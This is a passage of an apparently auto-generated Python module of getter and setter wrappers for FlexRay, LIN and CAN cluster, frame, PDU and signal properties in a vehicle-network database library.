_cconsts.NX_PROP_CLST_FLEX_RAY_CLST_DRIFT_DMP,
)
def set_cluster_flex_ray_clst_drift_dmp(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CLST_DRIFT_DMP,
value,
)
def get_cluster_flex_ray_cold_st_ats(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_COLD_ST_ATS,
)
def set_cluster_flex_ray_cold_st_ats(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_COLD_ST_ATS,
value,
)
def get_cluster_flex_ray_cycle(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CYCLE,
)
def set_cluster_flex_ray_cycle(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CYCLE,
value,
)
def get_cluster_flex_ray_dyn_seg_start(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_DYN_SEG_START,
)
def get_cluster_flex_ray_dyn_slot_idl_ph(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_DYN_SLOT_IDL_PH,
)
def set_cluster_flex_ray_dyn_slot_idl_ph(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_DYN_SLOT_IDL_PH,
value,
)
def get_cluster_flex_ray_latest_usable_dyn(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_LATEST_USABLE_DYN,
)
def get_cluster_flex_ray_latest_guar_dyn(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_LATEST_GUAR_DYN,
)
def get_cluster_flex_ray_lis_noise(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_LIS_NOISE,
)
def set_cluster_flex_ray_lis_noise(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_LIS_NOISE,
value,
)
def get_cluster_flex_ray_macro_per_cycle(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MACRO_PER_CYCLE,
)
def set_cluster_flex_ray_macro_per_cycle(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MACRO_PER_CYCLE,
value,
)
def get_cluster_flex_ray_macrotick(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MACROTICK,
)
def get_cluster_flex_ray_max_wo_clk_cor_fat(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MAX_WO_CLK_COR_FAT,
)
def set_cluster_flex_ray_max_wo_clk_cor_fat(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MAX_WO_CLK_COR_FAT,
value,
)
def get_cluster_flex_ray_max_wo_clk_cor_pas(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MAX_WO_CLK_COR_PAS,
)
def set_cluster_flex_ray_max_wo_clk_cor_pas(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MAX_WO_CLK_COR_PAS,
value,
)
def get_cluster_flex_ray_minislot_act_pt(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MINISLOT_ACT_PT,
)
def set_cluster_flex_ray_minislot_act_pt(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MINISLOT_ACT_PT,
value,
)
def get_cluster_flex_ray_minislot(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MINISLOT,
)
def set_cluster_flex_ray_minislot(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MINISLOT,
value,
)
def get_cluster_flex_ray_nm_vec_len(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NM_VEC_LEN,
)
def set_cluster_flex_ray_nm_vec_len(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NM_VEC_LEN,
value,
)
def get_cluster_flex_ray_nit(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NIT,
)
def set_cluster_flex_ray_nit(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NIT,
value,
)
def get_cluster_flex_ray_nit_start(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NIT_START,
)
def get_cluster_flex_ray_num_minislt(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NUM_MINISLT,
)
def set_cluster_flex_ray_num_minislt(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NUM_MINISLT,
value,
)
def get_cluster_flex_ray_num_stat_slt(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NUM_STAT_SLT,
)
def set_cluster_flex_ray_num_stat_slt(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NUM_STAT_SLT,
value,
)
def get_cluster_flex_ray_off_cor_st(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_OFF_COR_ST,
)
def set_cluster_flex_ray_off_cor_st(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_OFF_COR_ST,
value,
)
def get_cluster_flex_ray_payld_len_dyn_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_DYN_MAX,
)
def set_cluster_flex_ray_payld_len_dyn_max(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_DYN_MAX,
value,
)
def get_cluster_flex_ray_payld_len_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_MAX,
)
def get_cluster_flex_ray_payld_len_st(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_ST,
)
def set_cluster_flex_ray_payld_len_st(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_ST,
value,
)
def get_cluster_flex_ray_stat_slot(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_STAT_SLOT,
)
def set_cluster_flex_ray_stat_slot(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_STAT_SLOT,
value,
)
def get_cluster_flex_ray_sym_win(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYM_WIN,
)
def set_cluster_flex_ray_sym_win(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYM_WIN,
value,
)
def get_cluster_flex_ray_sym_win_start(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYM_WIN_START,
)
def get_cluster_flex_ray_sync_node_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYNC_NODE_MAX,
)
def set_cluster_flex_ray_sync_node_max(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYNC_NODE_MAX,
value,
)
def get_cluster_flex_ray_tss_tx(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_TSS_TX,
)
def set_cluster_flex_ray_tss_tx(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_TSS_TX,
value,
)
def get_cluster_flex_ray_wake_sym_rx_idl(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_IDL,
)
def set_cluster_flex_ray_wake_sym_rx_idl(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_IDL,
value,
)
def get_cluster_flex_ray_wake_sym_rx_low(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_LOW,
)
def set_cluster_flex_ray_wake_sym_rx_low(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_LOW,
value,
)
def get_cluster_flex_ray_wake_sym_rx_win(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_WIN,
)
def set_cluster_flex_ray_wake_sym_rx_win(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_WIN,
value,
)
def get_cluster_flex_ray_wake_sym_tx_idl(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_TX_IDL,
)
def set_cluster_flex_ray_wake_sym_tx_idl(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_TX_IDL,
value,
)
def get_cluster_flex_ray_wake_sym_tx_low(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_TX_LOW,
)
def set_cluster_flex_ray_wake_sym_tx_low(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_TX_LOW,
value,
)
def get_cluster_flex_ray_use_wakeup(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_USE_WAKEUP,
)
def set_cluster_flex_ray_use_wakeup(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_USE_WAKEUP,
value,
)
def get_cluster_lin_schedules(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_CLST_LIN_SCHEDULES,
)
def get_cluster_lin_tick(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_CLST_LIN_TICK,
)
def set_cluster_lin_tick(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_CLST_LIN_TICK,
value,
)
def get_cluster_flex_ray_alw_pass_act(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_ALW_PASS_ACT,
)
def set_cluster_flex_ray_alw_pass_act(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_ALW_PASS_ACT,
value,
)
def get_cluster_application_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_APPLICATION_PROTOCOL,
)
def set_cluster_application_protocol(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_APPLICATION_PROTOCOL,
value,
)
def get_cluster_can_fd_iso_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_ISO_MODE,
)
def get_frame_application_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_APPLICATION_PROTOCOL,
)
def set_frame_application_protocol(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_APPLICATION_PROTOCOL,
value,
)
def get_frame_cluster_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_FRM_CLUSTER_REF,
)
def get_frame_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_FRM_COMMENT,
)
def set_frame_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_FRM_COMMENT,
value,
)
def get_frame_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_CONFIG_STATUS,
)
def get_frame_default_payload(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u8_array(
ref,
_cconsts.NX_PROP_FRM_DEFAULT_PAYLOAD,
)
def set_frame_default_payload(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u8_array(
ref,
_cconsts.NX_PROP_FRM_DEFAULT_PAYLOAD,
value,
)
def get_frame_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_ID,
)
def set_frame_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_ID,
value,
)
def get_frame_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_FRM_NAME,
)
def set_frame_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_FRM_NAME,
value,
)
def get_frame_payload_len(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_PAYLOAD_LEN,
)
def set_frame_payload_len(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_PAYLOAD_LEN,
value,
)
def get_frame_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_SIG_REFS,
)
def get_frame_can_ext_id(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_CAN_EXT_ID,
)
def set_frame_can_ext_id(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_CAN_EXT_ID,
value,
)
def get_frame_can_timing_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_CAN_TIMING_TYPE,
)
def set_frame_can_timing_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_CAN_TIMING_TYPE,
value,
)
def get_frame_can_tx_time(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_FRM_CAN_TX_TIME,
)
def set_frame_can_tx_time(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_FRM_CAN_TX_TIME,
value,
)
def get_frame_flex_ray_base_cycle(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_BASE_CYCLE,
)
def set_frame_flex_ray_base_cycle(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_BASE_CYCLE,
value,
)
def get_frame_flex_ray_ch_assign(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_CH_ASSIGN,
)
def set_frame_flex_ray_ch_assign(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_CH_ASSIGN,
value,
)
def get_frame_flex_ray_cycle_rep(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_CYCLE_REP,
)
def set_frame_flex_ray_cycle_rep(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_CYCLE_REP,
value,
)
def get_frame_flex_ray_preamble(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_PREAMBLE,
)
def set_frame_flex_ray_preamble(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_PREAMBLE,
value,
)
def get_frame_flex_ray_startup(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_STARTUP,
)
def set_frame_flex_ray_startup(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_STARTUP,
value,
)
def get_frame_flex_ray_sync(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_SYNC,
)
def set_frame_flex_ray_sync(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_SYNC,
value,
)
def get_frame_flex_ray_timing_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_TIMING_TYPE,
)
def set_frame_flex_ray_timing_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_TIMING_TYPE,
value,
)
def get_frame_flex_ray_in_cyc_rep_enabled(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_ENABLED,
)
def get_frame_flex_ray_in_cyc_rep_i_ds(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_I_DS,
)
def set_frame_flex_ray_in_cyc_rep_i_ds(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_I_DS,
value,
)
def get_frame_flex_ray_in_cyc_rep_ch_assigns(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_CH_ASSIGNS,
)
def set_frame_flex_ray_in_cyc_rep_ch_assigns(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_CH_ASSIGNS,
value,
)
def get_frame_lin_checksum(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_LIN_CHECKSUM,
)
def get_frame_mux_is_muxed(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_MUX_IS_MUXED,
)
def get_frame_mux_data_mux_sig_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_FRM_MUX_DATA_MUX_SIG_REF,
)
def get_frame_mux_static_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_MUX_STATIC_SIG_REFS,
)
def get_frame_mux_subframe_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_MUX_SUBFRAME_REFS,
)
def get_frame_pdu_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_PDU_REFS,
)
def set_frame_pdu_refs(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_PDU_REFS,
value,
)
def get_frame_pdu_start_bits(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_PDU_START_BITS,
)
def set_frame_pdu_start_bits(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_PDU_START_BITS,
value,
)
def get_frame_pdu_update_bits(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_PDU_UPDATE_BITS,
)
def set_frame_pdu_update_bits(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_PDU_UPDATE_BITS,
value,
)
def get_frame_variable_payload(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_VARIABLE_PAYLOAD,
)
def set_frame_variable_payload(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_VARIABLE_PAYLOAD,
value,
)
def get_frame_can_io_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_CA_NIO_MODE,
)
def set_frame_can_io_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_CA_NIO_MODE,
value,
)
def get_pdu_cluster_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_PDU_CLUSTER_REF,
)
def get_pdu_default_payload(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u8_array(
ref,
_cconsts.NX_PROP_PDU_DEFAULT_PAYLOAD,
)
def set_pdu_default_payload(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u8_array(
ref,
_cconsts.NX_PROP_PDU_DEFAULT_PAYLOAD,
value,
)
def get_pdu_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_PDU_COMMENT,
)
def set_pdu_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_PDU_COMMENT,
value,
)
def get_pdu_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_PDU_CONFIG_STATUS,
)
def get_pdu_frm_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_PDU_FRM_REFS,
)
def get_pdu_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_PDU_NAME,
)
def set_pdu_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_PDU_NAME,
value,
)
def get_pdu_payload_len(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_PDU_PAYLOAD_LEN,
)
def set_pdu_payload_len(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_PDU_PAYLOAD_LEN,
value,
)
def get_pdu_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_PDU_SIG_REFS,
)
def get_pdu_mux_is_muxed(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_PDU_MUX_IS_MUXED,
)
def get_pdu_mux_data_mux_sig_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_PDU_MUX_DATA_MUX_SIG_REF,
)
def get_pdu_mux_static_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_PDU_MUX_STATIC_SIG_REFS,
)
def get_pdu_mux_subframe_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_PDU_MUX_SUBFRAME_REFS,
)
def get_signal_byte_ordr(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_BYTE_ORDR,
)
def set_signal_byte_ordr(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SIG_BYTE_ORDR,
value,
)
def get_signal_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SIG_COMMENT,
)
def set_signal_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_SIG_COMMENT,
value,
)
def get_signal_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_CONFIG_STATUS,
)
def get_signal_data_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_SIG_DATA_TYPE,
)
def set_signal_data_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_SIG_DATA_TYPE,
value,
)
def get_signal_default(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_DEFAULT,
)
def set_signal_default(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_DEFAULT,
value,
)
def get_signal_frame_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_SIG_FRAME_REF,
)
def get_signal_max(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_MAX,
)
def set_signal_max(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_MAX,
value,
)
def get_signal_min(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_SIG_MIN,
)
def set_signal_min(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_SIG_MIN,
value,
)
def get_signal_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_SIG_NAME,
)
def set_signal_name(
ref, # type: int
